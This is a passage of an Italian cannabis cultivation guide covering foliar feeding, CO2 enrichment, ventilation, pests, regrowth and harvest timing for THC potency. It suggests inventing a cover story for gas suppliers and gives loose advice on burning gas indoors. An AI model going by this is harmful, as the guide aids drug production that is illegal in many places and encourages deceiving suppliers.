possono alzarlo quando diventa troppo acido. Acquista un misuratore di PH per 10 dollari ed usalo nel terreno, nell'acqua, e nell'ambiente idroponico per accertarti che con il passare del tempo non diventi alcalino o acido. Per ambienti molto neutrali puoi usare un po' di aceto per portarlo da un valore di pH 7 a 6.5 o giù di lì. La maggior parte dei fertilizzanti causa un cambiamento di pH nel suolo. Aggiungendo fertilizzante al terreno quasi sempre si ha come conseguenza un pH più acido. Con il passare del tempo, l'accumulo di sali prodotti dalla scomposizione dei fertilizzanti nel suolo provoca un incremento progressivo dell'acidità del suolo ed alla fine la concentrazione di questi sali nel suolo arresterà lo sviluppo della pianta e causerà un oscuramento delle foglie. Inoltre, quando la pianta invecchia le sue radici diventano meno efficienti nel portare nutrimenti alle foglie. Per evitare l'accumulo di questi sali nella terra ed assicurare che la tua pianta assimili tutte le sostanze nutritive di cui ha bisogno puoi iniziare a nutrire le foglie della pianta quando ha raggiunto il mese e mezzo di vita. Disciogli il fertilizzante in acqua calda e spruzza la mistura direttamente sulle foglie. Le foglie assorbono il fertilizzante nelle loro nervature. Se vuoi continuare a mettere il fertilizzante anche nel suolo per nutrire le foglie, assicurati di non somministrare alle piante un'overdose di sostanze nutritive. NUTRIMENTO DELLE FOGLIE Il nutrimento delle foglie sembra essere una delle vie più facili per incrementare il raccolto, per velocizzare la crescita e la qualità in uno spazio ben ventilato, con o senza elevati livelli di CO2. Prepara semplicemente un infuso con escrementi di vermi, emulsioni di pesce, guano di pipistrello, o con molti altri nutrimenti per piante indicati per il fabbisogno alimentare durante gli stadi vegetativi e di prima fioritura. Non è raccomandato per la tarda fioritura, o sprecherai il materiale spruzzato tardi. Smetti di nutrire le foglie 2-3 settimane prima del raccolto. Lava le foglie con acqua pura ogni settimana per prevenire l'ostruzione degli stomi delle foglie. Cibale quotidianamente. Il miglior momento del giorno per nutrire le foglie è dalle 7 alle 10 del mattino e dopo le 5 del pomeriggio. Questo perché gli stomi nella parte inferiore delle foglie sono ancora aperti. Inoltre, la temperatura ideale è di 22 gradi, e sopra i 25 non possono essere affatto aperti. Così trovati la parte più fresca della giornata, se fa caldo, e la parte più calda se fuori fa freddo. Può essere che tu debba spruzzare le foglie alle due del mattino se è quella la parte del giorno più fresca. Lo spruzzatore usato deve atomizzare la soluzione in una nebbiolina molto fitta; tira fuori il tuo miglior spruzzatore ed usalo per questo scopo. Accertati che il PH sia tra 7 e 6.2. Usa bicarbonato di sodio per aumentare il PH della soluzione, ed aceto per diminuirlo. E' meglio spruzzare più spesso ed usarne meno per volta, che infradiciare le piante una volta ogni tanto. Usa un agente imbibente per prevenire la formazione di grosse gocce d'acqua, e di conseguenza che le foglie non si brucino come sotto l'azione di piccoli prismi riflettenti. Stai attento a non spruzzare su una lampadina accesa; meglio ancora, spruzza solo quando le lampadine si sono raffreddate (se bagni infatti una lampadina da troppe ore accesa e quindi molto calda, potrebbe scoppiare a contatto con una sostanza di gran lunga più fredda). Forse il miglior nutrimento per le foglie comprende l'uso di acqua di seltz e cibo per piante contemporaneamente. Così facendo, la CO2 e i nutrimenti sono forniti direttamente alle foglie con una sola spruzzata. Il nutrimento delle foglie è riconosciuto nella maggior parte dei testi specializzati come il metodo migliore per cibare una pianta una volta che i problemi di blocco delle sostanze nutrienti hanno iniziato a ridurre la capacità di assorbimento dalle radici. AVVERTIMENTO!: è importante lavare le foglie che devono essere raccolte prima che si siano asciugate, se intendi mangiarle, dal momento che possono avere nitrati su di loro. NOTA: Un coltivatore che ha letto questo documento ha commentato: "Le emulsioni di pesce puzzano. Il guano di pipistrello potrebbe essere molto antigienico. Tienti stretto il Rapid-Gro, il MgSO4 (sale inglese), la soluzione idroponica con elementi in tracce. I sali nitrati (l'"N" in NPK) non sono molto sani da fumare. Personalmente, io non nutro mai le foglie." Al di là di questo assennato commento, c'è molta saggezza nel mantenere organico, non tossico, un giardino. Personalmente, uso solo CO2 sulle mie piante idroponiche al coperto, e non nutro mai le foglie. Semplicemente non è necessario quando usi colture idroponiche. ANIDRIDE CARBONICA Elevati valori di anidride carbonica possono aumentare considerevolmente la velocità di accrescimento, fino quasi a raddoppiarla. Pare che le piante si siano evolute nei periodi primordiali in cui i livelli naturali di CO2 erano molto più elevati di quelli odierni. La pianta si serve della CO2 nella fotosintesi per produrre zuccheri che usa per costruirsi i tessuti. Aumentare i livelli di CO2 significa aumentare la capacità delle piante di produrre questi zuccheri e il tasso di crescita della pianta viene considerevolmente incrementato. Produrre CO2 in sicurezza, a buon mercato e/o con convenienza può essere una pena, ed è difficile da allestire. La CO2 è molto utile per la fioritura, quando la pianta è molto densa ed attraversa il momento più critico per quanto concerne la circolazione dell'aria nelle foglie. Se tu coltivi durante la fase vegetativa rigorosamente al coperto, (portando poi le tue piante all'aperto per la fioritura), allora la CO2 non sarà un fattore determinante a meno che tu non abbia una serra sigillata, un ripostiglio, uno sgabuzzino o una camera da letto, e desideri aumentare la produzione e ridurre il tempo di fioritura. Per una operazione al coperto di medie dimensioni un approccio è quello di usare contenitori di plastica di CO2 presi dai fornitori a domicilio. Questo inizialmente ha un certo costo, ma relativamente poco costoso sul lungo periodo. Questi sistemi sono indicati solo se la tua area non è né troppo grande né troppo piccola. Il sistema di base a taniche di CO2 è di questo tipo: Contenitore da 10 kg 100 dollari; Regolatore 159 dollari; Timer o regolatore 10-125 dollari; Il pieno di CO2 15-20 dollari Caso peggiore: 395 dollari per l'installazione di un contenitore di CO2 sincronizzato ad un aspiratore da un termostato. Si può produrre a basso costo CO2 bruciando gas metano. Comunque, il calore e il monossido di carbonio devono avere uno sfogo all'aria aperta. Si può ottenere CO2 acquistando o noleggiando bombole dai locali fornitori a domicilio. Se ti fanno domande, puoi dire di possedere un vecchio saldatore a casa che ti serve per aggiustare il tagliaerba (rimorchio, macchina, ecc...) Per un piccolo sgabuzzino, un serbatoio potrebbe durare 2 mesi, ma dipende da quanto gas rilascia, da quanto la stanza è ventilata, ore di ciclo di luce, fessure nella stanza, livelli di arricchimento e metodi di dispersione. Questo metodo può risultare fatale per il tuo piccolo ambiente. E' visto generalmente di buon occhio avere un piccolo flusso costante di CO2 sulle piante durante tutto il tempo in cui la luce è accesa, diffusa direttamente sopra le piante durante il tempo i cui i ventilatori sono spenti. Ci sono dei sistemi per conservare la CO2, ma questi possono costare un bel gruzzoletto. Quando la luce è spenta non c'è bisogno di CO2, così durante la fase della fioritura, ne userai la metà come se avessi il solenoide della CO2 collegato al timer della luce. Quando il ventilatore è acceso per il ricircolo, allora la CO2 viene interrotta. Questo può essere praticato per metà del tempo in cui la luce è accesa, in modo da incidere sui tempi di esposizione delle piante e sulla quantità di gas che realmente bisogna impiegare. In un ambiente chiuso, usare bombole di gas è la cosa migliore, dal momento che la produzione si somma all'effetto serra, e anche la CO2 in bombola viene catturata come parte del processo produttivo di molti materiali, e quindi riciclata. Fermentando, i generatori di CO2, e i metodi del bicarbonato di sodio e dell'aceto producono tutti nuova CO2 che incrementa l'effetto serra. E' possibile la creazione di CO2 dalla fermentazione e dai generatori. Un semplice generatore di CO2 potrebbe essere una stufa alimentata a propano. Questo funzionerà bene, per tutto il tempo in cui i gas potranno diffondersi nell'area di coltivazione, ed un ventilatore verrà impiegato per tenere in circolo la CO2 calda (che sale) e disponibile in basso al livello delle piante. Il fuoco e gli scarichi prodotti dalla stufa costituiscono anche un problema. Una stanza che deve essere ventilata per il 50% del tempo per liberare l'ambiente dal calore di una lampada e della stufa non riceverà tanta CO2 quanta una stanza che può essere lasciata senza ventilazione per diverse ore alla volta. Comunque, i generatori di CO2 sono l'unica strada da prendere per operazioni su larga scala. La fermentazione o l'aceto sul bicarbonato di sodio funzioneranno se non avrai molti cicli di ventilazione, ma se hai abbastanza calore da costringerti a fare costanti o regolari ventilazioni, questi metodi non risulteranno più pratici. Soltanto versa l'aceto sul bicarbonato di sodio e chiudi la porta, (perdi la tua CO2 tanto presto quanto più ventili l'area). Questo metodo lascia molto a desiderare, visto che non è facile regolarlo automaticamente, e richiede un'attenzione quotidiana. E' possibile comunque creare CO2 dalla fermentazione, lascia il vino diventare aceto, e versalo sul bicarbonato di sodio. E' il sistema più conveniente sotto il profilo economico per la maggior parte dei coltivatori da sgabuzzino, per i quali 400 dollari nel mettere in piedi la produzione di CO2 sono davvero una mazzata. Durante la fermentazione, il fermento continuamente si autoelimina; occupa molto spazio. Hai bisogno di un bidone capiente per aggiungere costantemente acqua, in modo che i livelli dell'alcol non si alzino quanto basta per eliminare il fermento. Lo zucchero viene impiegato per raggiungere velocemente questo scopo, ed un sacco da 5 Kg costerà 3,50 dollari o giù di lì al massimo in 2-3 settimane circa. E' anche difficile stimare cosa accade a lungo andare e a quanto ammonta realmente la produzione Un tubo che fuoriesce dalla cima e arriva in una vaschetta d'acqua formerà bolle e dimostrerà che si è verificata una produzione di CO2. Prova il bicarbonato di sodio mescolato con aceto, 1 cucchiaino: circa 30 cc. Questo reagirà provocando bollicine e gorgoglii quando liberi la CO2. Fallo solamente quando hai chiuso la porta che dà sulle tue piante. Una via MOLTO più conveniente per procurarsi CO2 si basa su 50 grammi di zucchero in una bottiglia da 2 litri di acqua (sterilizzata la prima volta con candeggina ed acqua, quindi risciacquata), più alcuni centilitri di piscio (!) o, se insisti, fermenti nutritivi presi da un semplice fornitore di birre a domicilio. Aggiungi i fermenti di birra, sbatti bene e mantienilo a 25 gradi. Passate 2 settimane o giù di lì produrrà circa 15 grammi di CO2 per ogni 30 grammi di zucchero impiegati. Guadagnerai un po' per volta, iniziando uno nuovo ogni 3 giorni o giù di lì. Con l'aggiunta di CO2 la crescita è fenomenale!!! Ho misurato di persona una crescita di 38 cm in 8 giorni sotto una lampadina HPS da 250 watt (con tubolari luminosi, a fissaggio orizzontale). Un buon contenitore è un bricco in plastica di latte da 4 litri, con un beccuccio sul tappo. Inoltre, la chiusura del passaggio di aria da una parte del tubo luminoso acceso nel bricco riempito con acqua tiene lontani i batteri e dimostra che la fermentazione è in atto. Una variazione possibile è quella di spruzzare acqua di seltz sulle piante due volte al giorno. Alcune celebrità del settore però non lo raccomandano, ricevendo di conseguenza incredibili cazziatoni da parte di chi, una volta provato, ha riscontrato dei miglioramenti nel raccolto. E' ovvio che ognuno vorrebbe adoperarsi solamente per un piccolo sgabuzzino non ventilato, ma potrebbe andare bene solo in alcuni casi. Potrebbe risultare oneroso con molte piante da spruzzare. Usa acqua di seltz, non bicarbonato di sodio in barrette, dal momento che contiene più sodio che potrebbe ostruire gli stomi delle piante. Lava le tue piante con acqua pura dopo 2 o 3 spruzzate di seltz. C'è molto lavoro, e non puoi automatizzarlo, ma forse è un bene! Ricorda, stare con le piante è una bellissima esperienza, e ti avvicina alla tua spiritualità e alla terra. L'acqua di seltz viene venduta nella maggior parte dei negozi di generi alimentari (Io l'ho comprata al Lucky's a 0.79 dollari per una bottiglia da 2 litri). Il bicarbonato di sodio in tavolette andrà bene lo stesso se proprio non hai acqua di seltz, ma ha il doppio del sodio rispetto all'acqua di seltz. Una soluzione veramente diluita di Miracle Grow può essere spruzzata sulla pianta insieme all'altra. Una delle caratteristiche dell'uso di acqua di seltz è che incrementa i livelli di umidità. Assicurati di ventilare l'ambiente umido durante il ciclo di buio, o potresti rischiare la formazione di funghi ed un aumento eccessivo della lunghezza degli internodi. ATTENZIONE: Non spruzzare troppo vicino ad una lampadina calda! Spruzza solo verso il basso, oppure prima spegni la luce. Anche se l'arricchimento con la CO2 può significare un incremento della produzione del 30-100%, la scocciatura, il costo, lo spazio, il pericolo ed il tempo impiegato possono rendere una ventilazione costante o molto costante un'alternativa molto invitante all'arricchimento. Finché la pianta ha l'opportunità di assimilare nuova CO2 di continuo, da aria che ha oltre 200 parti per milione di CO2, le piante avranno tutti i nutrimenti indispensabili per la fotosintesi. La maggior parte degli sgabuzzini avrà bisogno di un ricambio di nuova CO2 ogni due o tre ore, perlomeno. Quasi tutte le città hanno concentrazioni molto elevate di CO2 nell'aria, ed alcuni coltivatori trovano che iniezioni di CO2 in circostanze simili non sono necessarie. Alcuni coltivatori hanno scritto su High Times che elevate concentrazioni di CO2 nella stanza dedicata alla coltivazione in prossimità del periodo del raccolto diminuiscono la potenza del fumo. Può essere una buona idea terminare la somministrazione di CO2 due settimane prima del raccolto. VENTILAZIONE Devi ventilare molto se usi una lampada HID, meno per quelle a fluorescenza. Inoltre, la produzione di umidità richiede almeno una ventilazione di pochi minuti al giorno. Per una stanza con una lampada calda che produce calore rapidamente, la miglior ventilazione sarebbe una che libera la stanza in 5 minuti, quindi uno stop di 25 minuti prima di eseguire una nuova ventilazione, o allo stesso modo, una ventilazione di 3 minuti con 12 minuti di pausa e via di seguito. Il trucco sta nel trovare un timer che svolgerà questo compito. Non è facile da reperire e non è economico. Una volta che hai bisogno di regolare acceso/spento e viceversa la CO2 con il ventilatore, fai un pensierino ad un regolatore climatico per circa 100 dollari. Alternative possono essere un termostato che accende un ventilatore quando si è raggiunta una data temperatura, e lo spegne quando la temperatura scende di 4 gradi. Ma è una pizza coordinare la diffusione di CO2 con questo, dal momento che non sai quando il ventilatore si accende. 39 dollari per un termostato del genere, ma sincronizzarlo alla CO2 con un relé a rivelazione di voltaggio costa 100 dollari per l'interruttore bell'e pronto, così in sostanza il controllore ambientale a 100 dollari è più conveniente. Tutto ciò di cui hai realmente bisogno è un ventilatore che purifica l'aria in pochi minuti, un commutatore di temperatura che accende e spegne il ventilatore, ed un interruttore inverso che disattiva e attiva la produzione di CO2. Se puoi ventilare la stanza veramente in poco tempo ed il calore non si produce troppo in fretta, la CO2 può essere diffusa in maniera lenta, continua, e potrebbe essere prodotta tra i periodici e rapidi cicli di ricambio dell'aria. Si possono usare due timer sincronizzati, ma il solo sistema a buon mercato disponibile è l'intervallo di 30 minuti, dunque 48 scatti per 24 ore. In questo modo io posso avere un ventilatore che gira per 30 minuti, quindi spento per altri 30. Posso anche sincronizzarlo alla luce in modo da non dover essere costretto a ventilare quando la lampada è spenta. Posso sincronizzarlo ad un identico timer che attiverà la CO2 durante il tempo in cui il ventilatore non è acceso, e viceversa. Sarebbe difficile sincronizzarli a meno di 5-10 minuti, ma almeno ci sarebbe una soluzione possibile e poco costosa. 20 dollari per due di questi timer. Comprare ventilatori per far circolare l'aria è costoso, ma io mi sono semplicemente recato da liquidatori locali di componenti elettronici che avevano ventole d'occasione per 5-10 dollari, e così sono riuscito ad ottenere un risparmio effettivo di 50-70 dollari rispetto al prezzo di ventilatori nuovi in un negozio di articoli per giardinaggio. Un buon ventilatore manterrà l'umidità e la temperatura a valori bassi, e diffonderà la CO2 alle tue piante con l'apporto di nuova aria. Anche la circolazione interna dell'aria è realmente indispensabile. Si dovrebbe usare un ventilatore basculante per far circolare l'aria all'interno della stanza di coltivazione, per aiutare il ricircolo della CO2. In più manterrà bassa l'umidità, permettendo all'aria di assorbire più umidità, riducendo così il rischio di funghi. Un ventilatore a muro non porterà via spazio prezioso dal pavimento. Le migliori stanze di coltivazione hanno la massima circolazione dell'aria all'interno. TEMPERATURA La temperatura adatta è uno dei fattori maggiormente variabili. La maggior parte dei libri stabilisce che la temperatura ottimale per la crescita è di 20-25 gradi, ma c'è una lunga lista di circostanze attenuanti che provocano un aumento della temperatura. Assumere modificazioni genetiche non sembra essere un fattore, le piante sembrano potere assorbire più luce a temperature più elevate, forse fino a 30 gradi o poco più. Alti livelli di luce e di CO2 potrebbero spingere la temperatura a 35 gradi per incrementare la velocità di accrescimento (consulta: D. Gold: 'CO2, Temperature and Humidity', 1991 - Casa editrice E. Rosenthal). Una condizione ideale di 35 gradi è data da una luminosità molto intensa, un arricchimento di CO2 dell'ordine di 1500 parti per milione e una buona ventilazione costante per mantenere bassa l'umidità. Non è chiaro se questa temperatura ridurrà la potenza nei fiori. Può essere una buona idea ridurre la temperatura una volta che è cominciata la fase della fioritura, per mantenere la potenza del fumo, anche se riduce la velocità di accrescimento. Ma temperature più alte aumenteranno considerevolmente la velocità di crescita vegetativa della pianta, stimolandone il metabolismo, assumendo i livelli richiesti di CO2 e la luce disponibile, e impediranno un aumento dell'umidità. Con livelli normali di CO2, in uno spazio ben ventilato, 32 gradi sembrerebbero essere la temperatura massima consentita, mentre 30 gradi possono avvicinarsi maggiormente alle condizioni ideali, anche con molta luce a disposizione. Non lasciare la temperatura della stanza andare oltre i 35° C perché potrebbe incidere negativamente sullo sviluppo della pianta. La temperatura ottimale è tra i 27 e i 30 gradi se hai una luce intensa senza arricchimento di CO2. Meno di 21° C è troppo freddo per una crescita corretta. Le basse temperature di notte sono OK sotto i 15 gradi all'aperto, quindi comincia ad effettuare la crescita in grande stile. Una temperatura media intorno ai 10 gradi causerà un leggero shock e una attorno ai 4 gradi medi ucciderà le tue piante con una ripetuta esposizione. Tieni le tue piante al caldo, specialmente le radici. Alza i vasi se ti sembra che il terreno assorba il calore dalle radici. Questo può essere un problema se hai una lastra o un altro tipo di pavimento freddo. Come la temperatura sale, così aumenta la capacità dell'aria di trattenere acqua, quindi si riduce l'umidità, e pertanto una temperatura media più alta dovrebbe ridurre il rischio di funghi. In contrasto con molti rapporti, un alto tasso di umidità non è indicato per le piante eccetto durante la germinazione e la formazione delle radici. Una umidità più bassa aiuta la pianta a traspirare CO2 riducendo in questo modo il rischio di muffa durante la fioritura. Alcuni studi indicano che la potenza delle gemme scema quando la temperatura sale, così è importante stare attenti che le piante non ricevano troppo caldo durante i cicli della fioritura. PARASSITI Devi realmente guardarti dai parassiti, o tutti i tuoi sforzi potrebbero avere come conseguenza un minimo ritorno o, al peggio, la perdita di tutta la produzione. Acari e afidi sono i peggiori; mosche bianche, bruchi e funghi sono gli unici da tenere d'occhio a lungo termine. Un bombardamento di piretro può ripulire da zero la stanza, e quindi spruzzi di sapone fatto in casa o commerciale faranno il resto. Quando porti dentro le piante dall'esterno, spargi il piretro su ogni singola foglia in alto e in basso e anche sulla terra. Quindi ispezionale minuziosamente per una settimana o due, e insapona ogni residuo di vita degli insetti che trovi fin dalle uova che li hanno fatti nascere. Dovresti fare questo trucco per un mese o due, un periodo lungo a sufficienza per non avere problemi in vista del raccolto. I funghi sono un ulteriore ostacolo sulla via di una strepitosa stagione di raccolto. Quando i fiori sono all'incirca a metà dello sviluppo divengono soggetti a funghi o alla decomposizione delle gemme. Sembra che le condizioni di crescita dei funghi siano migliori quando la temperatura è tra i 15 e i 25 gradi e l'umidità è alta. I funghi sono molto distruttivi e si diffondono rapidamente. C'è un tipo di spora di fungo che raggiunge le altre gemme tramite il vento così è impossibile prevenirla o fermarla se le condizioni del tempo ne consentono lo sviluppo. Se le cose dovessero mettersi male e i funghi iniziassero ad intaccare le tue piante, devi rimuoverli immediatamente o si diffonderanno nelle altre aree della pianta o in altre piante. Alcuni coltivatori rimuovono soltanto la porzione di gemma infettata mentre altri rimuovono l'intero ramo. La rimozione del ramo intero assicura maggiormente che il fungo sia totalmente rimosso, e in più consente al coltivatore di assaggiare il raccolto con alcune settimane di anticipo. I funghi possono prosciugare il tuo raccolto rapidamente, quindi investi in alcuni fungicidi sicuri e spruzzali sulle piante solo prima della fioritura se pensi che i funghi possono crearti un problema. Non spruzzarli sulle piante se non mai ha avuto problemi prima con i funghi. Mantieni basso il livello di umidità, fai circolare l'aria come un pazzo sull'area di coltivazione e tieni le piante all'aperto che non sono state in quarantena lontano da quelle all'interno. Non aspettare fino a dopo la fioritura, dal momento che non è una buona idea applicare il fungicida direttamente sui fiori. Invece, i fiori devono essere tagliati quando sono infetti. La maggior parte dei fungicidi ha un odore sgradevole, e tu non vorrai certamente ingerirli o fumarli, così è necessario usarne uno che sia sicuro per i vegetali. Ancora meglio: procurati prodotti adeguati, di quelli che trovi nelle serre; contengono solo zolfo in soluzione. Usa una soluzione di sapone come Safer Insecticidal Soap per sbarazzarti della maggior parte dei problemi legati agli afidi. Usa alcuni estratti di tabacco e polvere di peperoncino piccante aggiunto a questo per gli acari. Dott. Bronnars Soap può essere impiegato con alcuni detersivi per piatti in uno spruzzatore se vuoi risparmiare denaro. Il piretro deve essere usato solo in circostanze estreme direttamente sulle piante, ma può essere usato in uno sgabuzzino o in una serra negli angoli per eliminare ragni e simili. Si decompone entro una settimana in elementi non-tossici, e può essere lavato da una pianta con soluzioni detergenti ed anche acqua pura. Trovo che il piretro sia la migliore soluzione per gli acari dei ragni, se è spruzzato sulle pianticelle ancora giovani fino alla prima fioritura. Nella fioritura avanzata il tabacco e una soluzione di peperoncino/sapone è la cosa migliore da farsi, con frequenza giornaliera, anche sul retro di tutte le foglie infette. Gli acari dei ragni sono di gran lunga i peggiori aggressori del mio giardino. Ho finalmente imparato a non portare le piante dall'esterno all'interno. Sono sempre infettate da parassiti e minacciano di infettare l'intera zona di coltivazione al coperto. E' molto più pratico lavorare con le stagioni e rigenerare le piante fuori in estate, piuttosto che portarle dentro per rigenerare sotto luce costante. Comincia a coltivare una pianta dentro e portala fuori in primavera per la fioritura. Prendi un raccolto o due, nutrila con azoto per tutta l'estate e si rigenererà naturalmente, per fiorire ancora in autunno. Una volta che una pianta è stata portata fuori, lasciala fuori. TRAPIANTARE Non si verificherà alcuno shock o al massimo uno veramente modesto se sei rapido e sensibile nel maneggiare le tue piante. Accertati di dover trapiantare due volte, o meglio ancora, una volta se possibile, durante l'intero ciclo di crescita. Trapiantare rallenterà la tua attività produttiva. Ti porta via tempo, è difficile, è un lavoro duro, e mette a rischio le piante. Comincia con il più capiente contenitore a tua disposizione, quadrato è meglio. Vaschette di plastica da 500 grammi sono OK, e bottiglie di coca cola da 2 litri tagliate in due possono essere abbastanza per il primo raccolto quando la pianta sta crescendo idroponicamente. Un contenitore parallelepipedo di plastica del latte o dell'acqua andrà bene lo stesso. Oppure comincia con semi e tagli di radici in vaschette di plastica da 500 grammi. E' meglio avere poche giovani piantine che molte visto che necessitano di trapianti continui. Queste vaschette più grandi occupano solo un po' di spazio in più, e consentono di trapiantare una sola volta prima di tirare su il primo raccolto. Trapiantala in un bricco d'acqua da 4 litri (tagliato a circa 3 litri) prima di forzare la crescita dei fiori. Per rigenerare questa pianta dopo il raccolto, trapiantala in un vaso più grande, una volta tornata nello stadio della crescita vegetativa, secchi di pittura da 20 litri funzionano bene se puoi risparmiare spazio, e un contenitore da 8-12 litri garantirebbe un secondo raccolto della pianta migliore del primo, anticipando la ricrescita vegetativa. Una nota in più: Uno studio russo ha dimostrato che le giovani pianticelle con almeno 10 cm di terra per sviluppare le radici in continuazione diventavano con più probabilità femmine. La fonte che cito dice "Questo può essere perché alcuni coltivatori hanno un rapporto femmina/maschio dell'ordine dell'80%/20%." SESSO SUBITO E' possibile stabilire il sesso di una pianta in anticipo, e quindi spostare le piante maschio fuori dall'area principale destinata alla coltivazione più presto, coprendo il ramo più basso di un pianta per 12 ore al giorno mentre è in uno stato vegetativo di luce costante. Usa una borsa di carta nera o simile per permettere il passaggio dell'aria mentre non fa filtrare la luce. Assicurati di approntare un ciclo regolare per questi rami coperti. Se permetti alla luce di raggiungerli durante il periodo di buio, non possono affatto indicarlo in anticipo. Usa una lente d'ingrandimento per osservare in anticipo il tipo di sesso dei fiori. Una pianta maschio avrà un fiore piccolo (carta da gioco) osservando un pre-fiore con un gambo piccolo al di sotto di esso. Un fiore femmina è di solito a singolo o doppio pistillo, bianco e sottile, che emerge da un calice immaturo. Alcune persone preferiscono preforzare le piante quando sono alte 20 cm, con l'intenzione di eliminare i maschi. Quando coltivano all'aperto, molti coltivatori non desiderano perdere tempo, spazio o energia per le piante maschio. Soltanto mettono le piante in un ciclo di luce di 12 ore per 2 settimane, separano le femmine dai maschi, quindi riportano i cicli di luce a 18-24 ore per continuare la crescita vegetativa per le femmine. Ricordati, questo è un processo che porta via tempo e può posticipare la crescita delle piante di 2 settimane. Non preforzare le piante a meno che tu non abbia molto tempo. Soltanto copri un ramo per pianta con carta nera (impermeabile alla luce, con passaggi d'aria) 12 ore ogni giorno sotto luce costante per forzare la prefioritura e separarle prima. RIGENERAZIONE E' possibile fare il raccolto delle piante e poi ringiovanirle vegetativamente per un secondo e anche un terzo raccolto. Un secondo raccolto può essere realizzato in meno di 6-8 settimane. Dal momento che lo stelo della pianta e le radici sono già formati, la pianta può produrre un secondo, e anche un terzo raccolto di gemme in poco più della metà del tempo del raccolto originale. Quando fai il raccolto, taglia il 1/3 della pianta più alto. Lascia i gruppi di foglie più rigogliosi nel centro della pianta, togliendo con molta attenzione i germogli via dai rami. Nel 1/3 della pianta più basso, cogli alla fine i fiori, ma lascia parecchi piccoli fiori su ogni ramo. Questi saranno la parte della pianta che verrà rigenerata. Le molte gemme che hai lasciato sulla pianta, rigenereranno il più velocemente possibile. Nutri la pianta con Miracle Grow o qualche altro fertilizzante ad alto contenuto di azoto subito dopo il raccolto. Quando intendi rigenerare una pianta, accertati che non abbia mai carenza di azoto durante la maturazione, o tutte le foglie esposte al sole cadranno, e la tua pianta non avrà abbastanza foglie per vivere dopo il raccolto. Una pianta dopo il raccolto può essere portata dentro per il ringiovanimento sotto luce continua o lasciata all'aperto l'estate per ringiovanire con la lunghezza naturale dei giorni. Ci vorranno 7-14 giorni per vedere i segni di un nuovo sviluppo quando rigeneri una pianta. Come abbiamo detto prima, ed in contrasto con gli esempi di sviluppo normale, i rami inferiori saranno i primi a sviluppare una nuova crescita vegetativa. Lascia crescere la pianta vegetativamente per un po', quindi portala fuori di nuovo per la rifioritura. Oppure lasciala dentro per la potatura vegetativa. Ora hai due o tre generazioni di piante che crescono, ed avrai bisogno di più spazio fuori. Ma farai il raccolto con il doppio della frequenza. Al ritmo di uno ogni 30 giorni, dal momento che hai nuovi cloni e piccole piantine che crescono, piante vegetative pronte per la fioritura e piante rigenerate che a loro volta fioriscono. Rigenerare al coperto può creare problemi se le tue piante sono infettate con parassiti. Può essere meglio creare un'area separata dentro che non permetterà alle tue piante di infettare la principale area di coltivazione al coperto. Un'alternativa alla rigenerazione al coperto è rigenerare fuori durante l'estate. Solamente prendi un raccolto in giugno, poi permetti alla pianta di rigenerare lasciando alcune gemme sui rami bassi della pianta e dedicando il 1/3 centrale delle foglie della pianta al raccolto. Nutrile con azoto, ed assicurati che prendano molto sole. Rigenererà per tutta l'estate e sarà piuttosto grande per l'autunno, quando comincerà a fiorire di nuovo spontaneamente. POTATURA Le piante che sono rigenerate, clonate ed anche cresciute da semi avranno bisogno di essere potate in certi punti per spingerle a produrre il più possibile e a mantenersi rigogliose. Potare i rami più bassi crea un maggior flusso d'aria sotto le piante in una situazione al coperto e crea ritagli di piante per la clonazione. Inoltre concentra l'attività della pianta ai rami superiori che ricevono la maggior parte della luce, incrementando la produzione. Le piante che sono state rigenerate abbisognano di una minor potatura in fase di crescita in modo che la principale crescita rigenerata otterrà tutta l'energia della pianta. Questo significa che una volta che la pianta ha cominciato a rigenerare una buona parte della crescita, i rami più bassi che saranno in ombra o poco robusti dovrebbero andarsene. Lo sviluppo deve essere sfoltito sui rami superiori in modo che rimanga solo la crescita più robusta. Un piacevole aspetto del rigenerare le piante è che alcune piccole gemme lasciate sulla pianta in vista della rigenerazione non daranno frutto a nuova crescita e potranno quindi essere raccolte per fumarle. La pianta può fornire molto materiale fumabile se preso prima che tutti i fiori maturi si secchino e muoiano con l'arrivo della nuova crescita vegetativa. Cerca di potare due volte una pianta rigenerata. Una volta quando comincia a rigenerare: raccogli ogni gemma che non germoglia con la nuova crescita e fumala. Quindi dopo, pota di nuovo per prendere i ritagli più bassi da clonare e sfoltisci la crescita superiore in modo da produrre grosse gemme. Se una pianta rigenerata non viene affatto potata, la pianta risulta piena di diramazioni, non crea gemme grandi ed il prodotto totale sarà considerevolmente ridotto. RACCOGLIERE ED ESSICCARE Fare il raccolto vuol dire cogliere i frutti di tanto duro lavoro, ed è il tempo più piacevole che impiegherai nel tuo giardino. Si fa il raccolto alle piante quando i fiori sono maturi. Generalmente, si stabilisce che un fiore è maturo quando i pistilli iniziano a diventare marroni, arancioni, ecc.. e cominciano a regredire in un falso baccello. I baccelli si gonfiano con resine normalmente riservate alla produzione dei semi, e così otteniamo gemme mature con peli rossi e dorati. E' interessante notare che il tempo del raccolto controlla lo sviluppo delle gemme. Se si è fatto il raccolto in anticipo con solo alcuni dei pistilli che hanno cambiato colore, le gemme avranno un contenuto di THC più puro ed avranno meno THC che muta in CBD e CBN. Le sostanze psicotrope creeranno l'aroma dell'erba, e controlleranno il grado di insensibilità e di sballo correlato ad un'elevata concentrazione. Un contenuto di THC puro crea un effetto molto cerebrale, mentre un contenuto elevato di THC, di CBD e di CBN renderà le piante più inclini a suscitare intontimento o un senso di annebbiamento. Le gemme colte tardi, quando pienamente maturate conterranno di norma questi elevati livelli di CBN, CBD e certamente non possono essere ciò che preferisci una volta che hai provato campioni differenti colti in momenti differenti. Non prestare ascolto agli esperti, decidi tu in base a ciò che preferisci. Ricordati, una gemma pesa di più quando completamente matura. E' ciò che alla maggior parte dei coltivatori piace vendere, ma prendi alcune giovani gemme per te, ogni settimana precedente il raccolto, e decidi come ti pare. Coltiva il resto fino ad una piena maturità se progetti di venderlo. Molti coltivatori in erba (nel senso che sono nuovi del giro) vogliono raccogliere in anticipo, perché sono impazienti. Questo è OK! Soltanto devi prendere le gemme dalla cima o dalla parte centrale della pianta. Lascia maturare il resto. Spesso, le cime delle piante matureranno per prime. Raccoglile e lascia continuare il resto della pianta a maturare. Noterai che le gemme più basse diventano più grandi e più gonfie e increspate quando raggiungono una completa maturazione. Con più luce a disposizione nella parte bassa della pianta ora, la pianta produce di più in questo modo con il passare del tempo, rispetto a prendere un singolo raccolto. Serviti di una lente d'ingrandimento per cercare di vedere i tricomi capitati (piccoli cristalli di THC sulle gemme). Se sono soprattutto chiari, non marroni, il punto massimo dell'aroma floreale è prossimo. Una volta che sono diventati per lo più tendenti al marrone nel colore, la concentrazione di THC comincia a scemare e la potenza ottimale del fiore si 